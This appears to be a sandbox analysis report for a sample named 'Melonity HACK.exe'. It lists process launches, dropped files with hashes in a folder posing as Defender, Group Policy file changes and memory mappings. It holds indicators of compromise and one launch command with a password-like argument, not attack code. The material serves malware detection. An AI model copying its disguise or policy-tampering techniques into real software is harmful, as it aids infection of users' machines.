C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ac.exeFilesize
14.7MB
MD568576adb3317d4277c8b910754db9dd6
SHA109dc1d7bf0c4f2e1eaaeffc2207435c8f02f75d6
SHA256be2d385b186b860114e69d949a399ac1de1d99bc93f5dde9f3828f71034b386e
SHA512a5f7be69aeda4d80024ff1bd17688dc0f20aef3ef53e240fd994effb407656a95dbd0ffb2b0d772d73fb13b9652a77eb30d130b252f6ad0f25d6f6fe4b4931c2
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.vbsFilesize
288B
MD5f412cd3e21869e9bed5b84a391c3e923
SHA1c9a9f3461de32ce457993cb862a3a6433baf5501
SHA256b9938c9ae8d9ef0c5187598882ec330aca856ae9202ba40affc766aad28ba348
SHA5123016e75e5d01d53293ac25a02bbec928049d241452448f3b91810eeda4c84acc36ed28dce6094752a8edec0b438369dbeaa3c0aa8538690af4e7ac318fea34ce
-
C:\ProgramData\Defender\dd.vbsFilesize
288B
MD57f6aeff67cf0ff0525016e06273317c5
SHA1faed754543e1c18926bea3e076c08a6faf650dcc
SHA2567ba00db5d700ccb9208db43b3f373e054d61594873d05430404f620d4d0deea1
SHA512fc78f91ca1774aae9cb798aefb53b57464c3ac3c8cf05d966b71a077bf4b065822a46270ea1289d25f7ac7190f89e537759996f6ee4caa4179a5309b43ed8a40
-
C:\ProgramData\Defender\t.batFilesize
732B
MD58c526aef3d9ff3365c92877aa3069758
SHA1559c2987c0209be0fe16315c553a6505323fc8db
SHA256d2873016df2a468a0d506ebc7bde3c413dd9ae5ece08073ede7e9e263bd59d9b
SHA512ea16fa435a24fea5ca1f1c4abf6c05556b877e44668d6a587ed8c3d6a2d79d4dcd85d238a297f1ff0f2e362e6a5995217ede0f6dbcc15c5a12176f9bdba0bd5c
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\u.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Users\Admin\Downloads\Melonity HACK.exeFilesize
16.8MB
MD501e11b4bf36299650fb033a346b46e76
SHA103f22ac75a70a9687552618ad47b3b86cf26a693
SHA2566ec174d704d09f7d01bd98adc489cf8447d553810f4e7c0d84a13547d6ce16b2
SHA5121971dd33ec5e5d84401a0b00290244ba075a60c8516745c13600794eba5b2b9af3fcdc431a9f42b9c2289871e26ea5cb64fe459acc92dc164073f35163371371
-
C:\Windows\SysWOW64\GroupPolicy\gpt.iniFilesize
11B
MD5ec3584f3db838942ec3669db02dc908e
SHA18dceb96874d5c6425ebb81bfee587244c89416da
SHA25677c7c10b4c860d5ddf4e057e713383e61e9f21bcf0ec4cfbbc16193f2e28f340
SHA51235253883bb627a49918e7415a6ba6b765c86b516504d03a1f4fd05f80902f352a7a40e2a67a6d1b99a14b9b79dab82f3ac7a67c512ccf6701256c13d0096855e
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
235B
MD554784465609d5525bca207b3944147aa
SHA12218c0745866141a7c820a71ca342779f7e77162
SHA256cded0ecd37bbdbc0ecfd9501f87e9875e9cea87dfa8568c7a973bd500f4a478c
SHA5129affd32ef9f35a5006d9638ec0c221d8c356620702c266aea08118c3e792a121a0443fc3a48fa583f53b63a65f177536d17918a0415964e26010a1f87a07ef3c
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
3KB
MD5ca371b43e4ff6dc472a8037c2a5bc69f
SHA15a0ff91820baa64c0dd3aea5bb99d1523973ecec
SHA2567c3fad50fa7fecfab30d70d50df17a90a5e6b887bae5edc482659daef30efb02
SHA512874257d1fce9260b8400f15b38c073e37ce3594fe502573a42e2e236ce8a57d5a9b52e35108ee324c28a734e5b57737cf13272e1e09126b540ad1c89eadf88ec
-
C:\Windows\System32\GroupPolicy\User\Registry.polFilesize
520B
MD50e7c336637fa0448940665f0aa026c96
SHA1bfc72d8957667c7ebc1535848d2a9c0240d98af9
SHA256aace755c854c2d470bcffc53139930eaaf68d2add28bc4b48befa981d2d74ed1
SHA5129884b4b8b54e2b2bb829ee44b88367425a444c6d48d6e12ee22cc888c9fdbff41f92107e8429ade0a257a290609453ff9bd636922a559b9f37c377d438fd7b45
-
\??\pipe\crashpad_2348_PYDJCZQXFFTBTDSKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/116-192-0x0000000000000000-mapping.dmp
-
memory/212-164-0x0000000000000000-mapping.dmp
-
memory/216-170-0x0000000000000000-mapping.dmp
-
memory/224-205-0x0000000000000000-mapping.dmp
-
memory/940-207-0x0000000000000000-mapping.dmp
-
memory/1120-221-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/1172-179-0x0000000000000000-mapping.dmp
-
memory/1292-218-0x00007FFA00C90000-0x00007FFA01751000-memory.dmpFilesize
10.8MB
-
memory/1292-217-0x000001A639320000-0x000001A639342000-memory.dmpFilesize
136KB
-
memory/1304-195-0x0000000000000000-mapping.dmp
-
memory/1336-175-0x0000000000000000-mapping.dmp
-
memory/1460-177-0x0000000000000000-mapping.dmp
-
memory/1460-201-0x0000000000000000-mapping.dmp
-
memory/1488-211-0x0000000000000000-mapping.dmp
-
memory/1488-202-0x0000000000000000-mapping.dmp
-
memory/1812-209-0x0000000000000000-mapping.dmp
-
memory/1812-187-0x0000000000000000-mapping.dmp
-
memory/1884-213-0x0000000000000000-mapping.dmp
-
memory/1916-225-0x00007FFA00C90000-0x00007FFA01751000-memory.dmpFilesize
10.8MB
-
memory/1916-165-0x0000000000000000-mapping.dmp
-
memory/1916-216-0x0000000000000000-mapping.dmp
-
memory/1932-181-0x0000000000000000-mapping.dmp
-
memory/1932-168-0x0000000000000000-mapping.dmp
-
memory/2056-185-0x0000000000000000-mapping.dmp
-
memory/2076-190-0x0000000000000000-mapping.dmp
-
memory/2128-174-0x0000000000000000-mapping.dmp
-
memory/2236-212-0x0000000000000000-mapping.dmp
-
memory/2236-196-0x0000000000000000-mapping.dmp
-
memory/2268-219-0x000002249ACF0000-0x000002249AD10000-memory.dmpFilesize
128KB
-
memory/2268-220-0x000002249AD40000-0x000002249AD44000-memory.dmpFilesize
16KB
-
memory/2844-162-0x0000000000000000-mapping.dmp
-
memory/2944-171-0x0000000000000000-mapping.dmp
-
memory/3060-194-0x0000000000000000-mapping.dmp
-
memory/3148-138-0x0000000000000000-mapping.dmp
-
memory/3220-167-0x0000000000000000-mapping.dmp
-
memory/3360-161-0x0000000000000000-mapping.dmp
-
memory/3468-200-0x0000000000000000-mapping.dmp
-
memory/3468-160-0x0000000000000000-mapping.dmp
-
memory/3480-204-0x0000000000000000-mapping.dmp
-
memory/3600-173-0x0000000000000000-mapping.dmp
-
memory/3612-189-0x0000000000000000-mapping.dmp
-
memory/3688-214-0x0000000000000000-mapping.dmp
-
memory/3732-140-0x0000000000000000-mapping.dmp
-
memory/3752-169-0x0000000000000000-mapping.dmp
-
memory/3792-203-0x0000000000000000-mapping.dmp
-
memory/3832-199-0x0000000000000000-mapping.dmp
-
memory/3932-132-0x0000000000000000-mapping.dmp
-
memory/4016-176-0x0000000000000000-mapping.dmp
-
memory/4040-215-0x0000000000000000-mapping.dmp
-
memory/4116-166-0x0000000000000000-mapping.dmp
-
memory/4136-143-0x0000000000000000-mapping.dmp
-
memory/4136-146-0x00000000007A0000-0x00000000007AA000-memory.dmpFilesize
40KB
-
memory/4232-206-0x0000000000000000-mapping.dmp
-
memory/4244-135-0x0000000000000000-mapping.dmp
-
memory/4252-197-0x0000000000000000-mapping.dmp
-
memory/4284-208-0x0000000000000000-mapping.dmp
-
memory/4320-198-0x0000000000000000-mapping.dmp
-
memory/4324-188-0x0000000000000000-mapping.dmp
-
memory/4324-147-0x0000000000000000-mapping.dmp
-
memory/4492-182-0x0000000000000000-mapping.dmp
-
memory/4552-191-0x0000000000000000-mapping.dmp
-
memory/4692-210-0x0000000000000000-mapping.dmp
-
memory/4692-178-0x0000000000000000-mapping.dmp
-
memory/4712-157-0x0000000000000000-mapping.dmp
-
memory/4728-193-0x0000000000000000-mapping.dmp
-
memory/4776-184-0x0000000000000000-mapping.dmp
-
memory/4828-183-0x0000000000000000-mapping.dmp
-
memory/4856-180-0x0000000000000000-mapping.dmp
-
memory/4856-228-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/4856-227-0x0000000140000000-0x0000000141B39000-memory.dmpFilesize
27.2MB
-
memory/5000-151-0x0000000000000000-mapping.dmp
-
memory/5000-186-0x0000000000000000-mapping.dmp
-
memory/5116-172-0x0000000000000000-mapping.dmp